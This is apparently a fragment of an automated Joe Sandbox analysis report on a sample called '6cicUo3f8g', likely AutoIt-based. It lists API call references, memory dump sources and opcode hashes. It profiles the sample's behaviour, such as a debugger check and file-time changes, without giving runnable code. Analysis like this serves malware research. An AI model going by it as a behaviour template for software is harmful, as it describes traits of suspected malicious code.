                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CreateExit
                                                                                                                • String ID: D
                                                                                                                • API String ID: 126409537-2746444292
                                                                                                                • Opcode ID: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                                                • Instruction ID: f45dd244fefe51250bc374a9d91f1637375972bd122d92b270861824a152f91e
                                                                                                                • Opcode Fuzzy Hash: 8ff53cc741f04adc946779470c72492426263afa614c789403871e93d35377f7
                                                                                                                • Instruction Fuzzy Hash: 55F0EC7554024CABDB60EFE0CD49FEE7779BF44701F508508FB0A9A284DB7496088B61
                                                                                                                APIs
                                                                                                                • GetTempPathW.KERNEL32(00000104,?), ref: 009498F8
                                                                                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0094990F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Temp$FileNamePath
                                                                                                                • String ID: aut
                                                                                                                • API String ID: 3285503233-3010740371
                                                                                                                • Opcode ID: facdbeb67b902fe50e3140653cb7994cee4f4661223fd91b1169e05266a28c2d
                                                                                                                • Instruction ID: 0f7dfb9bc31ae44216b771c8659e3b7943eeca7ee4fb753043d39fdb95a84f34
                                                                                                                • Opcode Fuzzy Hash: facdbeb67b902fe50e3140653cb7994cee4f4661223fd91b1169e05266a28c2d
                                                                                                                • Instruction Fuzzy Hash: FED05E7954430DABDB50DBA4EC1EF9A773CE704704F0002B5FA64910A1EAB095989FA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2b29ed6ec31d9b6b80456ef77bd766314ad7c47aded320609298f37c21969b3e
                                                                                                                • Instruction ID: 8980dcc4e29b2aabc8bc013172e8aced2db0f098fe2bb3321daeecf22d50ec25
                                                                                                                • Opcode Fuzzy Hash: 2b29ed6ec31d9b6b80456ef77bd766314ad7c47aded320609298f37c21969b3e
                                                                                                                • Instruction Fuzzy Hash: 11F136B16083419FCB14DF29C480A6ABBE5FF89314F14892EF8999B351D774E949CF82
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00900193
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000010,00000000), ref: 0090019B
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 009001A6
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 009001B1
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000011,00000000), ref: 009001B9
                                                                                                                  • Part of subcall function 00900162: MapVirtualKeyW.USER32(00000012,00000000), ref: 009001C1
                                                                                                                  • Part of subcall function 008F60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,008EF930), ref: 008F6154
                                                                                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 008EF9CD
                                                                                                                • OleInitialize.OLE32(00000000), ref: 008EFA4A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 009245C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1986988660-0
                                                                                                                • Opcode ID: f4f91776db34fd3d6fc3cd04299176ff870c8f8a1d1edd10f2cfd7eaa2e7aa5d
                                                                                                                • Instruction ID: ab356007be7888bea746e4f43731e284efc60bd0a2ea77d7fa41d01f131e1f90
                                                                                                                • Opcode Fuzzy Hash: f4f91776db34fd3d6fc3cd04299176ff870c8f8a1d1edd10f2cfd7eaa2e7aa5d
                                                                                                                • Instruction Fuzzy Hash: F581ACB0B2DB40DFC794DF79A8446187BE5FF9E306752812AE119CB272EB704484AF91
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 008E4370
                                                                                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 008E4415
                                                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 008E4432
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: IconNotifyShell_$_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1505330794-0
                                                                                                                • Opcode ID: 82b85c4d078aad7e6bd021df90c0b5791ce2705994b052fce21443ca46c4fcbd
                                                                                                                • Instruction ID: bcc4aed31d6dff838269a63c3a0733d49f8894d00cd465f05bc6416c052ad928
                                                                                                                • Opcode Fuzzy Hash: 82b85c4d078aad7e6bd021df90c0b5791ce2705994b052fce21443ca46c4fcbd
                                                                                                                • Instruction Fuzzy Hash: 073184706097419FC721DF25D884B9BBBF8FF4A308F00092EE59AC2291D771A944DB92
                                                                                                                APIs
                                                                                                                • __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090A16B: __NMSG_WRITE.LIBCMT ref: 0090A192
                                                                                                                  • Part of subcall function 0090A16B: __NMSG_WRITE.LIBCMT ref: 0090A19C
                                                                                                                • __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090A1C8: GetModuleFileNameW.KERNEL32(00000000,009A33BA,00000104,?,00000001,00000000), ref: 0090A25A
                                                                                                                  • Part of subcall function 0090A1C8: ___crtMessageBoxW.LIBCMT ref: 0090A308
                                                                                                                  • Part of subcall function 0090309F: ___crtCorExitProcess.LIBCMT ref: 009030A5
                                                                                                                  • Part of subcall function 0090309F: ExitProcess.KERNEL32 ref: 009030AE
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                • RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1372826849-0
                                                                                                                • Opcode ID: df5586cf70ed86ca4dce0d0243cad770303db1c4351fd1f4ee90a87ea30e05bd
                                                                                                                • Instruction ID: fefd61d068a3ddd08927116f6ca18240ea7601740bfab293135bee180bf8e687
                                                                                                                • Opcode Fuzzy Hash: df5586cf70ed86ca4dce0d0243cad770303db1c4351fd1f4ee90a87ea30e05bd
                                                                                                                • Instruction Fuzzy Hash: 2601B176358B02EED6102738EC82B2F739C9FC2761F52053AF419DA1C1DEB49C00AAA1
                                                                                                                APIs
                                                                                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00949548,?,?,?,?,?,00000004), ref: 009498BB
                                                                                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00949548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 009498D1
                                                                                                                • CloseHandle.KERNEL32(00000000,?,00949548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 009498D8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$CloseCreateHandleTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 3397143404-0
                                                                                                                • Opcode ID: ccf8f7573696d0d618f3eb36587a6413c5a1af148df41643de31984d6aba6ff3
                                                                                                                • Instruction ID: e41ff700f4880dae0d898ad6e9bc611c9bba92c99447d864a98ce6b7697ccbf7
                                                                                                                • Opcode Fuzzy Hash: ccf8f7573696d0d618f3eb36587a6413c5a1af148df41643de31984d6aba6ff3
                                                                                                                • Instruction Fuzzy Hash: FDE08632155214BBD7211B54FC09FCA7B59AB067A0F114224FB14691E087F12511A798
                                                                                                                APIs
                                                                                                                • _free.LIBCMT ref: 00948D1B
                                                                                                                  • Part of subcall function 00902D55: RtlFreeHeap.NTDLL(00000000,00000000,?,00909A24), ref: 00902D69
                                                                                                                  • Part of subcall function 00902D55: GetLastError.KERNEL32(00000000,?,00909A24), ref: 00902D7B
                                                                                                                • _free.LIBCMT ref: 00948D2C
                                                                                                                • _free.LIBCMT ref: 00948D3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 776569668-0
                                                                                                                • Opcode ID: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                                • Instruction ID: a96114d1f8fbec452178fc90700708fdd87b13ea775e762d9528cc90faf8e816
                                                                                                                • Opcode Fuzzy Hash: e92dce40d9500f9ac2a34e83b90a716ef22a9282606ba49fbfd8bfa905bb999e
                                                                                                                • Instruction Fuzzy Hash: EAE017A1A026214ACB24AAB8B948F9B23EC4F9C752B54091EF40DD71C6CE64FC828128
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: CALL
                                                                                                                • API String ID: 0-4196123274
                                                                                                                • Opcode ID: 5c36d14471a618f58c3523387a56dfb64728fe45581eb0599d72a24b79ef32b2
                                                                                                                • Instruction ID: b749c7ad565c4a6d07f06631864e24d11e13753c32d6aed84a8868991df09fa8
                                                                                                                • Opcode Fuzzy Hash: 5c36d14471a618f58c3523387a56dfb64728fe45581eb0599d72a24b79ef32b2
                                                                                                                • Instruction Fuzzy Hash: A6226A70608385DFC728DF15C490B6ABBE1FF86704F15896DE89A9B262D731EC45CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID: EA06
                                                                                                                • API String ID: 4104443479-3962188686
                                                                                                                • Opcode ID: 29c2267d4c6760e3fefd892f37a94f3c346aef876ce289767ebb0cce1bc9297b
                                                                                                                • Instruction ID: 7a68bfe29c808e4681fb8e3c6ed380a27a60d50284bbd69481122fc88bdd1cb5
                                                                                                                • Opcode Fuzzy Hash: 29c2267d4c6760e3fefd892f37a94f3c346aef876ce289767ebb0cce1bc9297b
                                                                                                                • Instruction Fuzzy Hash: 68417D21B041DC6BDF219F5A8C517BE7BA6FB47304F286464FC8EDB282D6349D4483A2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove
                                                                                                                • String ID:
                                                                                                                • API String ID: 4104443479-0
                                                                                                                • Opcode ID: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                                • Instruction ID: edbdef98b70bac80b88816ad5e9cd81aa5dddb3f5b33209416c5e5937e97fb5d
                                                                                                                • Opcode Fuzzy Hash: 46582b96aeec324da78ef56eed91b45771a50d96531055e0ceaadfa18d8b089e
                                                                                                                • Instruction Fuzzy Hash: 6E31B8B1704656AFC704DF69C8D1E69F3A9FF89320B158639E919CB391EB30E950CB90
                                                                                                                APIs
                                                                                                                • IsThemeActive.UXTHEME ref: 008E4834
                                                                                                                  • Part of subcall function 0090336C: __lock.LIBCMT ref: 00903372
                                                                                                                  • Part of subcall function 0090336C: DecodePointer.KERNEL32(00000001,?,008E4849,00937C74), ref: 0090337E
                                                                                                                  • Part of subcall function 0090336C: EncodePointer.KERNEL32(?,?,008E4849,00937C74), ref: 00903389
                                                                                                                  • Part of subcall function 008E48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 008E4915
                                                                                                                  • Part of subcall function 008E48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E492A
                                                                                                                  • Part of subcall function 008E3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 008E3B68
                                                                                                                  • Part of subcall function 008E3B3A: IsDebuggerPresent.KERNEL32 ref: 008E3B7A
                                                                                                                  • Part of subcall function 008E3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009A52F8,009A52E0,?,?), ref: 008E3BEB
                                                                                                                  • Part of subcall function 008E3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 008E3C6F
                                                                                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008E4874
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 1438897964-0
                                                                                                                • Opcode ID: 30986feb5b863fde8f3e7f200c794d3683f312daea88cbdcb1fe19d1b4d7ba34
                                                                                                                • Instruction ID: 72e9369afdc351b243f904cd159d8299b7040ec23c1df0a1b4bcf136719643b3
                                                                                                                • Opcode Fuzzy Hash: 30986feb5b863fde8f3e7f200c794d3683f312daea88cbdcb1fe19d1b4d7ba34
                                                                                                                • Instruction Fuzzy Hash: 4A118C719183959FC700EF2AE845A0ABBE8FF8A750F10852EF494832B1DBB09544DB92
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0090571C: __FF_MSGBANNER.LIBCMT ref: 00905733
                                                                                                                  • Part of subcall function 0090571C: __NMSG_WRITE.LIBCMT ref: 0090573A
                                                                                                                  • Part of subcall function 0090571C: RtlAllocateHeap.NTDLL(01440000,00000000,00000001,00000000,?,?,?,00900DD3,?), ref: 0090575F
                                                                                                                • std::exception::exception.LIBCMT ref: 00900DEC
                                                                                                                • __CxxThrowException@8.LIBCMT ref: 00900E01
                                                                                                                  • Part of subcall function 0090859B: RaiseException.KERNEL32(?,?,?,00999E78,00000000,?,?,?,?,00900E06,?,00999E78,?,00000001), ref: 009085F0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                • String ID:
                                                                                                                • API String ID: 3902256705-0
                                                                                                                • Opcode ID: e1dc9c581ae1d493386ba34f83600df63c57f229d308455dcc2bbbb285bb3a71
                                                                                                                • Instruction ID: 9b924dad12610f2f16ce6f4465c188a21350e0a1852be077ed29eb651bd7bfc4
                                                                                                                • Opcode Fuzzy Hash: e1dc9c581ae1d493386ba34f83600df63c57f229d308455dcc2bbbb285bb3a71
                                                                                                                • Instruction Fuzzy Hash: 0DF0A43250431E6EDB20AB98EC05BDF77ECDF81311F10486AF948A62D1DF719A40D6E1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __lock_file_memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 26237723-0
                                                                                                                • Opcode ID: 7b31f027ec3ae6d062aa2c2eda93a938835bbdf895af1fbc92a605f292e10206
                                                                                                                • Instruction ID: 275ea5f855ada424d473194e13171167a7ae0fdfdc46ec756cb967f89e1a4d69
                                                                                                                • Opcode Fuzzy Hash: 7b31f027ec3ae6d062aa2c2eda93a938835bbdf895af1fbc92a605f292e10206
                                                                                                                • Instruction Fuzzy Hash: 0E01F771800A08EFCF12AF68DC02A9F7B65AFD1321F464215F8241A1D1DB328E11DF91
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00908B28: __getptd_noexit.LIBCMT ref: 00908B28
                                                                                                                • __lock_file.LIBCMT ref: 009053EB
                                                                                                                  • Part of subcall function 00906C11: __lock.LIBCMT ref: 00906C34
                                                                                                                • __fclose_nolock.LIBCMT ref: 009053F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158934239.00000000009A7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_8e0000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                • String ID:
                                                                                                                • API String ID: 2800547568-0
                                                                                                                • Opcode ID: 70ae666d10b734b6f0080823dc6ae20e58af5abc420a3bd591b4c2f38cf0c99a
                                                                                                                • Instruction ID: 7af5f524e11599e64014f5abfe8e4abc8e5106e4d5ab0a193b5c8b8d98f9ff33
                                                                                                                • Opcode Fuzzy Hash: 70ae666d10b734b6f0080823dc6ae20e58af5abc420a3bd591b4c2f38cf0c99a
                                                                                                                • Instruction Fuzzy Hash: DDF0BB31900A04DEDB107F7598027AF77E46FC1374F268204A4A4AB1C1CFFC89415F61
                                                                                                                APIs
                                                                                                                  • Part of subcall function 01671F98: GetFileAttributesW.KERNELBASE(?), ref: 01671FA3
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000), ref: 01672884
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2160356077.0000000001671000.00000040.00000020.00020000.00000000.sdmp, Offset: 01671000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_1671000_6cicUo3f8g.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AttributesCreateDirectoryFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 3401506121-0
                                                                                                                • Opcode ID: 0cbd88b522e112101222fa742f4d8a65d6b784b1ad00e785f65063bf376e3622
                                                                                                                • Instruction ID: a7d304c6520bb3060dd88a84b3e9c1b7276084a0d20393dbde97e31e7b268e68
                                                                                                                • Opcode Fuzzy Hash: 0cbd88b522e112101222fa742f4d8a65d6b784b1ad00e785f65063bf376e3622
                                                                                                                • Instruction Fuzzy Hash: E4518031A1120997EF14EFA4CC54BEE733AEF58700F10856DA609F7280EB799B45CBA5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2158618379.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2158468915.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.000000000096F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158767852.0000000000994000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2158820268.000000000099E000.00000004.00000001.01000000.00000003.sdmp
